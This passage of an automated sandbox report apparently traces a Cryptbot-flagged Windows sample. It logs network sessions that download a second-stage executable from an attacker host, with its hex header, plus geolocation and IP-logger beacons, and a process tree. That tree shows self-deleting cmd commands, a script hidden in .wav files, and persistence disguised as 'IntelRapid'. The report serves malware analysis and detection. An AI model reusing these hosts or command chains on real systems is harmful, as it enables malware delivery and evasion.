                                                                    Data Raw: 38 62 31 63 61 66 63 31 2d 64 36 35 39 2d 34 38 33 34 2d 61 62 32 36 2d 39 38 32 63 38 37 31 62 61 38 37 36
                                                                    Data Ascii: 8b1cafc1-d659-4834-ab26-982c871ba876


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    3192.168.2.749756185.185.71.18380C:\Users\user\Desktop\7yyqdBJVGf.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Sep 28, 2021 15:24:11.146605015 CEST1007OUTGET /download.php?file=lv.exe HTTP/1.1
                                                                    Accept: */*
                                                                    Accept-Encoding: gzip, deflate
                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                    Host: zukelx03.top
                                                                    Connection: Keep-Alive
                                                                    Sep 28, 2021 15:24:11.297038078 CEST1007INHTTP/1.1 302 Found
                                                                    Date: Tue, 28 Sep 2021 13:24:11 GMT
                                                                    Server: Apache/2.2.22 (@RELEASE@)
                                                                    X-Powered-By: PHP/5.3.3
                                                                    Location: downfiles/lv.exe
                                                                    Content-Length: 0
                                                                    Connection: close
                                                                    Content-Type: text/html


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    4192.168.2.749757185.185.71.18380C:\Users\user\Desktop\7yyqdBJVGf.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Sep 28, 2021 15:24:11.349715948 CEST1008OUTGET /downfiles/lv.exe HTTP/1.1
                                                                    Accept: */*
                                                                    Accept-Encoding: gzip, deflate
                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                    Host: zukelx03.top
                                                                    Connection: Keep-Alive
                                                                    Sep 28, 2021 15:24:11.483042002 CEST1009INHTTP/1.1 200 OK
                                                                    Date: Tue, 28 Sep 2021 13:24:11 GMT
                                                                    Server: Apache/2.2.22 (@RELEASE@)
                                                                    Last-Modified: Tue, 28 Sep 2021 09:56:00 GMT
                                                                    ETag: "380018-44fbf6-5cd0b38838d02"
                                                                    Accept-Ranges: bytes
                                                                    Content-Length: 4520950
                                                                    Connection: close
                                                                    Content-Type: application/octet-stream
                                                                    Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 41 7b d1 6b 05 1a bf 38 05 1a bf 38 05 1a bf 38 0c 62 3c 38 06 1a bf 38 0c 62 2c 38 14 1a bf 38 05 1a be 38 a9 1a bf 38 1e 87 15 38 09 1a bf 38 1e 87 25 38 04 1a bf 38 1e 87 22 38 04 1a bf 38 52 69 63 68 05 1a bf 38 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 e4 e2 47 4f 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 74 00 00 00 7a 07 00 00 42 00 00 af 38 00 00 00 10 00 00 00 90 00 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 06 00 00 00 05 00 00 00 00 00 00 00 00 00 17 00 00 04 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 40 ac 00 00 b4 00 00 00 00 00 16 00 18 ef 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 08 00 94 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 90 00 00 d0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 8c 72 00 00 00 10 00 00 00 74 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 6e 2b 00 00 00 90 00 00 00 2c 00 00 00 78 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 9c 2b 07 00 00 c0 00 00 00 02 00 00 00 a4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 6e 64 61 74 61 00 00 00 10 0e 00 00 f0 07 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 c0 2e 72 73 72 63 00 00 00 18 ef 00 00 00 00 16 00 00 f0 00 00 00 a6 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 d6 0f 00 00 00 f0 16 00 00 10 00 00 00 b8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 55 8b ec 83 ec 5c 83 7d 0c 0f 74 2b 83 7d 0c 46 8b 45 14 75 0d 83 48 18 10 8b 0d b4 ea 47 00 89 48 04
                                                                    Data Ascii: MZ@!L!This program cannot be run in DOS mode.$A{k888b<88b,888888%88"88Rich8PELGOtzB8@@@`.textrt `.rdatan+,x@@.data+@.ndata.rsrc@@.reloc@BU\}t+}FEuHGH


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    5192.168.2.749836208.95.112.180C:\Users\user\AppData\Local\Temp\IXP000.TMP\Bisogna.exe.com
                                                                    TimestampkBytes transferredDirectionData
                                                                    Sep 28, 2021 15:26:15.914666891 CEST10458OUTGET /json HTTP/1.1
                                                                    Accept: */*
                                                                    Accept-Encoding: gzip, deflate
                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                    Host: ip-api.com
                                                                    Connection: Keep-Alive
                                                                    Sep 28, 2021 15:26:15.946197987 CEST10458INHTTP/1.1 200 OK
                                                                    Date: Tue, 28 Sep 2021 13:26:15 GMT
                                                                    Content-Type: application/json; charset=utf-8
                                                                    Content-Length: 281
                                                                    Access-Control-Allow-Origin: *
                                                                    X-Ttl: 60
                                                                    X-Rl: 44
                                                                    Data Raw: 7b 22 73 74 61 74 75 73 22 3a 22 73 75 63 63 65 73 73 22 2c 22 63 6f 75 6e 74 72 79 22 3a 22 53 77 69 74 7a 65 72 6c 61 6e 64 22 2c 22 63 6f 75 6e 74 72 79 43 6f 64 65 22 3a 22 43 48 22 2c 22 72 65 67 69 6f 6e 22 3a 22 5a 48 22 2c 22 72 65 67 69 6f 6e 4e 61 6d 65 22 3a 22 5a 75 72 69 63 68 22 2c 22 63 69 74 79 22 3a 22 5a 75 72 69 63 68 22 2c 22 7a 69 70 22 3a 22 38 31 35 32 22 2c 22 6c 61 74 22 3a 34 37 2e 34 33 2c 22 6c 6f 6e 22 3a 38 2e 35 37 31 38 2c 22 74 69 6d 65 7a 6f 6e 65 22 3a 22 45 75 72 6f 70 65 2f 5a 75 72 69 63 68 22 2c 22 69 73 70 22 3a 22 44 61 74 61 63 61 6d 70 20 4c 69 6d 69 74 65 64 22 2c 22 6f 72 67 22 3a 22 43 64 6e 37 37 20 5a 55 52 20 49 54 58 22 2c 22 61 73 22 3a 22 41 53 36 30 30 36 38 20 44 61 74 61 63 61 6d 70 20 4c 69 6d 69 74 65 64 22 2c 22 71 75 65 72 79 22 3a 22 38 34 2e 31 37 2e 35 32 2e 33 39 22 7d
                                                                    Data Ascii: {"status":"success","country":"Switzerland","countryCode":"CH","region":"ZH","regionName":"Zurich","city":"Zurich","zip":"8152","lat":47.43,"lon":8.5718,"timezone":"Europe/Zurich","isp":"Datacamp Limited","org":"Cdn77 ZUR ITX","as":"AS60068 Datacamp Limited","query":"84.17.52.39"}


                                                                    HTTPS Proxied Packets

                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    0192.168.2.74984988.99.66.31443C:\Windows\SysWOW64\wscript.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    2021-09-28 13:26:19 UTC0OUTGET /1N5Jh7 HTTP/1.1
                                                                    Accept: */*
                                                                    Accept-Language: en-us
                                                                    Accept-Encoding: gzip, deflate
                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                    Host: iplogger.org
                                                                    Connection: Keep-Alive
                                                                    2021-09-28 13:26:19 UTC0INHTTP/1.1 200 OK
                                                                    Server: nginx
                                                                    Date: Tue, 28 Sep 2021 13:26:19 GMT
                                                                    Content-Type: image/png
                                                                    Transfer-Encoding: chunked
                                                                    Connection: close
                                                                    Set-Cookie: PHPSESSID=jer3i1qcg3tltbsbr27ddfhjc0; path=/; HttpOnly
                                                                    Pragma: no-cache
                                                                    Set-Cookie: clhf03028ja=84.17.52.39; expires=Wed, 18-Jul-2029 05:49:51 GMT; Max-Age=246212612; path=/
                                                                    Set-Cookie: timezone=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/
                                                                    Set-Cookie: timezone=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/
                                                                    Cache-Control: no-cache
                                                                    Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                                    Answers:
                                                                    whoami: 05fcf0cbbe3b0d43d2db2a195dd6e41b94c72f810bf1e1eb0cd5f245ef5b4d6e
                                                                    Strict-Transport-Security: max-age=31536000; preload
                                                                    X-Frame-Options: DENY
                                                                    2021-09-28 13:26:19 UTC1INData Raw: 37 34 0d 0a 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 01 00 00 00 01 01 03 00 00 00 25 db 56 ca 00 00 00 03 50 4c 54 45 00 00 00 a7 7a 3d da 00 00 00 01 74 52 4e 53 00 40 e6 d8 66 00 00 00 09 70 48 59 73 00 00 0e c4 00 00 0e c4 01 95 2b 0e 1b 00 00 00 0a 49 44 41 54 08 99 63 60 00 00 00 02 00 01 f4 71 64 a6 00 00 00 00 49 45 4e 44 ae 42 60 82 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 74PNGIHDR%VPLTEz=tRNS@fpHYs+IDATc`qdIENDB`0


                                                                    Code Manipulations

                                                                    Statistics

                                                                    Behavior

                                                                    Click to jump to process

                                                                    System Behavior

                                                                    Analysis Process: 7yyqdBJVGf.exe PID: 2916 Parent PID: 5612

                                                                    General

                                                                    Start time:15:23:42
                                                                    Start date:28/09/2021
                                                                    Path:C:\Users\user\Desktop\7yyqdBJVGf.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:'C:\Users\user\Desktop\7yyqdBJVGf.exe'
                                                                    Imagebase:0x400000
                                                                    File size:380416 bytes
                                                                    MD5 hash:267667A4BBFDFCF20C407C2B191FD0ED
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Yara matches:
                                                                    • Rule: JoeSecurity_Cryptbot, Description: Yara detected Cryptbot, Source: 00000000.00000002.315679467.0000000000400000.00000040.00020000.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_Cryptbot, Description: Yara detected Cryptbot, Source: 00000000.00000002.316198160.0000000003080000.00000040.00000001.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_Cryptbot, Description: Yara detected Cryptbot, Source: 00000000.00000003.251202902.00000000030D0000.00000004.00000001.sdmp, Author: Joe Security
                                                                    Reputation:low

                                                                    Analysis Process: File.exe PID: 2116 Parent PID: 2916

                                                                    General

                                                                    Start time:15:24:13
                                                                    Start date:28/09/2021
                                                                    Path:C:\Users\user\AppData\Local\Temp\File.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:'C:\Users\user~1\AppData\Local\Temp\File.exe'
                                                                    Imagebase:0x400000
                                                                    File size:4520950 bytes
                                                                    MD5 hash:303F5DE158A079AAE941319BE50D1F2D
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Antivirus matches:
                                                                    • Detection: 33%, ReversingLabs
                                                                    Reputation:low

                                                                    Analysis Process: cmd.exe PID: 5072 Parent PID: 2916

                                                                    General

                                                                    Start time:15:24:13
                                                                    Start date:28/09/2021
                                                                    Path:C:\Windows\SysWOW64\cmd.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:'C:\Windows\system32\cmd.exe' /c rd /s /q C:\Users\user~1\AppData\Local\Temp\djUYPUrixI & timeout 4 & del /f /q 'C:\Users\user\Desktop\7yyqdBJVGf.exe'
                                                                    Imagebase:0x870000
                                                                    File size:232960 bytes
                                                                    MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:high

                                                                    Analysis Process: conhost.exe PID: 4976 Parent PID: 5072

                                                                    General

                                                                    Start time:15:24:14
                                                                    Start date:28/09/2021
                                                                    Path:C:\Windows\System32\conhost.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                    Imagebase:0x7ff774ee0000
                                                                    File size:625664 bytes
                                                                    MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:high

                                                                    Analysis Process: wheezy.exe PID: 1708 Parent PID: 2116

                                                                    General

                                                                    Start time:15:24:14
                                                                    Start date:28/09/2021
                                                                    Path:C:\Users\user\AppData\Local\Temp\dislip\wheezy.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:C:\Users\user~1\AppData\Local\Temp\dislip\wheezy.exe
                                                                    Imagebase:0x4e0000
                                                                    File size:916160 bytes
                                                                    MD5 hash:20B1305BCB80B32661D564CE22DF4C24
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Antivirus matches:
                                                                    • Detection: 100%, Joe Sandbox ML
                                                                    • Detection: 9%, ReversingLabs
                                                                    Reputation:low

                                                                    Analysis Process: timeout.exe PID: 3888 Parent PID: 5072

                                                                    General

                                                                    Start time:15:24:14
                                                                    Start date:28/09/2021
                                                                    Path:C:\Windows\SysWOW64\timeout.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:timeout 4
                                                                    Imagebase:0xe60000
                                                                    File size:26112 bytes
                                                                    MD5 hash:121A4EDAE60A7AF6F5DFA82F7BB95659
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:high

                                                                    Analysis Process: parted.exe PID: 160 Parent PID: 2116

                                                                    General

                                                                    Start time:15:24:15
                                                                    Start date:28/09/2021
                                                                    Path:C:\Users\user\AppData\Local\Temp\dislip\parted.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:C:\Users\user~1\AppData\Local\Temp\dislip\parted.exe
                                                                    Imagebase:0x7ff613610000
                                                                    File size:3570176 bytes
                                                                    MD5 hash:C92045F9553387FE8AB90B2B6A24E805
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Antivirus matches:
                                                                    • Detection: 36%, ReversingLabs
                                                                    Reputation:low

                                                                    Analysis Process: dllhost.exe PID: 4712 Parent PID: 1708

                                                                    General

                                                                    Start time:15:24:16
                                                                    Start date:28/09/2021
                                                                    Path:C:\Windows\SysWOW64\dllhost.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:dllhost.exe
                                                                    Imagebase:0xee0000
                                                                    File size:19360 bytes
                                                                    MD5 hash:70E2034A1C3D0ECCB73F57E33D4BFFA0
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language

                                                                    Analysis Process: cmd.exe PID: 5112 Parent PID: 1708

                                                                    General

                                                                    Start time:15:24:17
                                                                    Start date:28/09/2021
                                                                    Path:C:\Windows\SysWOW64\cmd.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:cmd /c cmd < Quegli.wav
                                                                    Imagebase:0x870000
                                                                    File size:232960 bytes
                                                                    MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language

                                                                    Analysis Process: conhost.exe PID: 5508 Parent PID: 5112

                                                                    General

                                                                    Start time:15:24:17
                                                                    Start date:28/09/2021
                                                                    Path:C:\Windows\System32\conhost.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                    Imagebase:0x7ff774ee0000
                                                                    File size:625664 bytes
                                                                    MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language

                                                                    Analysis Process: cmd.exe PID: 5456 Parent PID: 5112

                                                                    General

                                                                    Start time:15:24:19
                                                                    Start date:28/09/2021
                                                                    Path:C:\Windows\SysWOW64\cmd.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:cmd
                                                                    Imagebase:0x870000
                                                                    File size:232960 bytes
                                                                    MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language

                                                                    Analysis Process: findstr.exe PID: 5528 Parent PID: 5456

                                                                    General

                                                                    Start time:15:24:19
                                                                    Start date:28/09/2021
                                                                    Path:C:\Windows\SysWOW64\findstr.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:findstr /V /R '^DUaegCnUMchmsYAygRiDFQbmDzwCKZUZJepHBYJZehdUDKbgCOorIoZNvTmUBVpMAhPfPTEdoiBamDVSWNqWRRdBeclInOnitDzdUonJlSVAHHhSXGYOUhVJWgj$' Bel.wav
                                                                    Imagebase:0x2b0000
                                                                    File size:29696 bytes
                                                                    MD5 hash:8B534A7FC0630DE41BB1F98C882C19EC
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language

                                                                    Analysis Process: Bisogna.exe.com PID: 5296 Parent PID: 5456

                                                                    General

                                                                    Start time:15:24:20
                                                                    Start date:28/09/2021
                                                                    Path:C:\Users\user\AppData\Local\Temp\IXP000.TMP\Bisogna.exe.com
                                                                    Wow64 process (32bit):true
                                                                    Commandline:Bisogna.exe.com l
                                                                    Imagebase:0x8b0000
                                                                    File size:893608 bytes
                                                                    MD5 hash:C56B5F0201A3B3DE53E561FE76912BFD
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language

                                                                    Analysis Process: IntelRapid.exe PID: 1988 Parent PID: 160

                                                                    General

                                                                    Start time:15:24:20
                                                                    Start date:28/09/2021
                                                                    Path:C:\Users\user\AppData\Roaming\Intel Rapid\IntelRapid.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:C:\Users\user\AppData\Roaming\Intel Rapid\IntelRapid.exe
                                                                    Imagebase:0x7ff777f80000
                                                                    File size:3570176 bytes
                                                                    MD5 hash:C92045F9553387FE8AB90B2B6A24E805
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Antivirus matches:
                                                                    • Detection: 36%, ReversingLabs

                                                                    Analysis Process: PING.EXE PID: 2860 Parent PID: 5456

                                                                    General

                                                                    Start time:15:24:20
                                                                    Start date:28/09/2021
                                                                    Path:C:\Windows\SysWOW64\PING.EXE
                                                                    Wow64 process (32bit):true
                                                                    Commandline:ping 127.0.0.1
                                                                    Imagebase:0x320000
                                                                    File size:18944 bytes
                                                                    MD5 hash:70C24A306F768936563ABDADB9CA9108
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language

                                                                    Analysis Process: Bisogna.exe.com PID: 4884 Parent PID: 5296

                                                                    General

                                                                    Start time:15:24:21
                                                                    Start date:28/09/2021
                                                                    Path:C:\Users\user\AppData\Local\Temp\IXP000.TMP\Bisogna.exe.com
                                                                    Wow64 process (32bit):true
                                                                    Commandline:C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\Bisogna.exe.com l
                                                                    Imagebase:0x8b0000
                                                                    File size:893608 bytes
                                                                    MD5 hash:C56B5F0201A3B3DE53E561FE76912BFD
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language

                                                                    Analysis Process: IntelRapid.exe PID: 6180 Parent PID: 1104

                                                                    General

                                                                    Start time:15:24:22
                                                                    Start date:28/09/2021
                                                                    Path:C:\Users\user\AppData\Roaming\Intel Rapid\IntelRapid.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:C:\Users\user\AppData\Roaming\Intel Rapid\IntelRapid.exe
                                                                    Imagebase:0x7ff777f80000
                                                                    File size:3570176 bytes
                                                                    MD5 hash:C92045F9553387FE8AB90B2B6A24E805
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language

                                                                    Analysis Process: rundll32.exe PID: 6264 Parent PID: 3292

                                                                    General

                                                                    Start time:15:24:27
                                                                    Start date:28/09/2021
                                                                    Path:C:\Windows\System32\rundll32.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:'C:\Windows\system32\rundll32.exe' C:\Windows\system32\advpack.dll,DelNodeRunDLL32 'C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\'
                                                                    Imagebase:0x7ff71f5a0000
                                                                    File size:69632 bytes
                                                                    MD5 hash:73C519F050C20580F8A62C849D49215A
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language

                                                                    Analysis Process: IntelRapid.exe PID: 6464 Parent PID: 3292

                                                                    General

                                                                    Start time:15:24:35
                                                                    Start date:28/09/2021
                                                                    Path:C:\Users\user\AppData\Roaming\Intel Rapid\IntelRapid.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:'C:\Users\user\AppData\Roaming\Intel Rapid\IntelRapid.exe'
                                                                    Imagebase:0x7ff777f80000
                                                                    File size:3570176 bytes
                                                                    MD5 hash:C92045F9553387FE8AB90B2B6A24E805
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language

                                                                    Analysis Process: wscript.exe PID: 6388 Parent PID: 4884

                                                                    General

                                                                    Start time:15:26:16
                                                                    Start date:28/09/2021
                                                                    Path:C:\Windows\SysWOW64\wscript.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:'C:\Windows\System32\WScript.exe' 'C:\Users\user~1\AppData\Local\Temp\lmlpnsexh.vbs'
                                                                    Imagebase:0x1330000
                                                                    File size:147456 bytes
                                                                    MD5 hash:7075DD7B9BE8807FCA93ACD86F724884
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language

                                                                    Disassembly

                                                                    Code Analysis

                                                                    Reset < >